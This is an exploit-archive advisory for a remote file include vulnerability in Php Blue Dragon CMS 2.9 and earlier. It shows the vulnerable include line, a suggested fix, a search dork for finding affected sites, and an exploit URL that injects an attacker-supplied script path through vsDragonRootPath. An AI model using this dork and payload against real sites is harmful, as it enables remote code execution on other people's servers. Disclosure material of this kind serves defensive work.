id: 417
date: 05/11/2006
title: Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability
author: Kacper
cves: 

============================================================
Php Blue Dragon CMS <= 2.9 Remote File Include Vulnerability
============================================================




################DEVIL TEAM THE BEST POLISH TEAM#################
#Php Blue Dragon Platinum - Remote File Include
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#dork: powered by Php Blue Dragon Platinum
################################################################
[code]
// Szukanie u.ytkownika
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
[/code]

Fix:
[code]
// Szukanie u.ytkownika
$vsDragonRootPath = "./";
include($vsDragonRootPath."public_includes/pub_language/".$UserSession
-> SessionData["SesUserLanguage"]."/mod_privmsg.".$phpExt);
[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[dragon_path]/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=[evil_scripts]



#  0day.today [2023-03-26]  #